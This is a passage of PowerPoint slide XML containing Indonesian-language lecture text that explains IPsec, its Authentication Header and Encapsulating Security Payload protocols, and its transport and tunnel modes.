            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> overhead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPsec, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri-sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama-sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Authentication Header (AH)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Integrity Check Value (ICV). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Muatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Encapsulating Security Payload (ESP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ICV. ESP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melampirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: header, trailer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> padding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan Integrity Check Value. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AH, ESP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ICV.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>IPsec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua mode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Mode transport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika ESP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode transport, header IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data payload. Jika AH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode transport, AH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ESP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP (header dan payload) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkapsulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> datagram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
